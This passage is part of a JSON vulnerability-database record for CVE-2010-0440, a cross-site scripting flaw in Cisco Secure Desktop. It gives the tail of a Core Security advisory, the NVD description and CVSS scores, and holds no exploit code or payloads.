advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.\n\n### 13\\. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team.\n", "cvss3": {}, "published": "2010-02-01T00:00:00", "type": "coresecurity", "title": "Cisco Secure Desktop XSS/JavaScript Injection", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0440"], "modified": "2010-02-01T00:00:00", "id": "CORE-2010-0106", "href": "https://www.coresecurity.com/core-labs/advisories/cisco-secure-desktop-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T11:35:57", "description": "Cross-site scripting (XSS) vulnerability in +CSCOT+/translation in Cisco Secure Desktop 3.4.2048, and other versions before 3.5; as used in Cisco ASA appliance before 8.2(1), 8.1(2.7), and 8.0(5); allows remote attackers to inject arbitrary web script or HTML via a crafted POST parameter, which is not properly handled by an eval statement in binary/mainv.js that writes to start.html.", "cvss3": {}, "published": "2010-02-03T18:30:00", "type": "cve", "title": "CVE-2010-0440", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0440"], "modified": "2018-11-15T18:52:00", "cpe": [], "id": "CVE-2010-0440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0440", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}
